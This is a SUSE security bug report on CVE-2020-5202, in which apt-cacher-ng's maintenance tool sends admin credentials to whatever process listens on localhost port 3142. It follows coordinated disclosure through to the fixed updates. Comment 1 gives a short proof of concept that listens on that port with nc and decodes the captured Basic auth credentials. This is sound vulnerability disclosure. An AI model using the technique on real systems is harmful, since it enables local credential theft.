Bug 1157706 - (CVE-2020-5202) VUL-0: CVE-2020-5202: apt-cacher-ng: acngtool uses localhost connection instead of socket by default
(CVE-2020-5202)
VUL-0: CVE-2020-5202: apt-cacher-ng: acngtool uses localhost connection inste...
Status: RESOLVED FIXED
Classification: Novell Products
Product: SUSE Security Incidents
Classification: Novell Products
Component: Incidents
unspecified
Other Other
: P3 - Medium : Normal
: ---
Assigned To: Security Team bot
Security Team bot
:
Depends on:
Blocks:
  Show dependency treegraph
 
Reported: 2019-11-25 15:01 UTC by Matthias Gerstner
Modified: 2020-05-13 08:20 UTC (History)
3 users (show)

See Also:
Found By: ---
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description Matthias Gerstner 2019-11-25 15:01:36 UTC
Another finding from bug 1150532. The apt-cacher-ng cron job runs the
`acngtool` like this by default:

```
/usr/lib/apt-cacher-ng/acngtool maint -c /etc/apt-cacher-ng SocketPath=/var/run/apt-cacher-ng/socket
```

It turns out the apt-cacher-ng daemon opens a localhost socket on port 3142 by
default but also a UNIX domain socket in /var/run/apt-cacher-ng/socket.

Even though the SocketPath is explicitly passed to acngtool, the tool prefers
the localhost communication via port 3142. This could allow a local attacker
to bind to port 3142 to setup a fake apt-cacher-ng service that the acngtool
will then talk to. This works when the attacker wins a race against systemd
trying to start the daemon. Of if the daemon is simply not enabled at all, or
crashes.

Since apt-cacher-ng also supports credentials and no peer verification is done
by default, the cron job would send those credentials to the unprivileged
local user. Therefore is this a serious information leak.

The bug is coming from the upstream code. I've traced it back to
source/acngtool.cc:503 where the following happens:

```
	auto nips = Tokenize(cfg::bindaddr, SPACECHARS, hostips, true);
	if (!nips)
		hostips.emplace_back("localhost");
```

So if no explicit BinAddr was configured in the config files then localhost is
used. The SocketPath passed on the command line seems to be ignored.

I will need to report this to upstream which I will do tomorrow. Please treat
this as confidential for the moment until I could offer coordinated disclosure
to upstream.
Comment 1 Matthias Gerstner 2019-11-26 14:03:05 UTC
I wrote an email to the upstream maintainer describing the problem. Let's see
what he says. The following is a PoC for the weakness:

```
root # grep AdminAuth /etc/apt-cacher-ng/security.conf
AdminAuth: mooma:moopa

root # systemctl stop apt-cacher-ng

user $ nc -l -p 3142

root # /etc/cron.daily/apt-cacher-ng

GET /acng-report.html?doExpire=Start%2bExpiration&abortOnErrors=aOe HTTP/1.1
User-Agent: Debian Apt-Cacher-NG/2
Host: localhost
Authorization: Basic bW9vbWE6bW9vcGE=
Cache-Control: no-store,no-cache,max-age=0
Accept: application/octet-stream
Accept-Encoding: identity
Connection: close
```

user $ echo 'bW9vbWE6bW9vcGE=' | base64 -d
mooma:moopa
```
Comment 2 Matthias Gerstner 2019-11-27 14:32:23 UTC
The Debian maintainer responded quickly to my report. He acknowledges the
issue as described in this bug. It seems they will need an embargo period,
because the fix will require more than just a few lines of code. We didn't
agree upon a fixed embargo period yet. I will update when I know more.

Since this is now officially an embargoed bug please don't publish any
information about this issue until the security team lifts the embargo. This
also includes not submitting a bugfix or description of this issue to the OBS.
Thank you!
Comment 3 Matthias Gerstner 2019-12-05 10:53:30 UTC
I've discussed a first patch proposal with Debian upstream. There was no reply
for some days now. The debian security team also didn't react yet. They will
supposedly assign a DSA (Debian-Security-Advisory) and CVE on their end. When
a final patch is agreed upon I will share it in this bug.
Comment 4 Matthias Gerstner 2020-01-15 13:09:20 UTC
So Debian upstream somehow made an uncoordinate release of this security
bugfix. Basically the CVE and the related information is already public [1].
Not everything is finished yet on Debian side but since the information is
public we can publish ourselves just as well.

I will take care of this bug since no maintainer could be found so far.

Since the package is in such a bad state the proactive security team agreed to
do the following:

- file a delete request for apt-cacher-ng in Factory.
- submit a maintenance update for apt-cacher-ng in maintained Leap versions
  that fixes the issues the best we can.

[1]: https://security-tracker.debian.org/tracker/CVE-2020-5202
Comment 5 Swamp Workflow Management 2020-01-20 14:20:14 UTC
This is an autogenerated message for OBS integration:
This bug (1157706) was mentioned in
https://build.opensuse.org/request/show/765843 15.1 / apt-cacher-ng
Comment 6 Matthias Gerstner 2020-01-21 09:36:23 UTC
I published this on oss-sec [1]. I also added the post as a public reference
to the CVE via the Mitre web form, such that Mitre published the CVE in their
database.

[1]: https://seclists.org/oss-sec/2020/q1/21
Comment 7 Swamp Workflow Management 2020-01-29 11:15:07 UTC
openSUSE-SU-2020:0124-1: An update that fixes two vulnerabilities is now available.

Category: security (important)
Bug References: 1157703,1157706
CVE References: CVE-2019-18899,CVE-2020-5202
Sources used:
openSUSE Leap 15.1 (src):    apt-cacher-ng-3.1-lp151.3.3.1
Comment 8 Swamp Workflow Management 2020-01-29 20:41:29 UTC
openSUSE-SU-2020:0146-1: An update that fixes two vulnerabilities is now available.

Category: security (important)
Bug References: 1157703,1157706
CVE References: CVE-2019-18899,CVE-2020-5202
Sources used:
openSUSE Backports SLE-15-SP1 (src):    apt-cacher-ng-3.1-bp151.4.3.1
Comment 9 Matthias Gerstner 2020-05-13 08:13:57 UTC
reassigning to security-team, this should be done by now
Comment 10 Alexandros Toptsoglou 2020-05-13 08:20:49 UTC
Done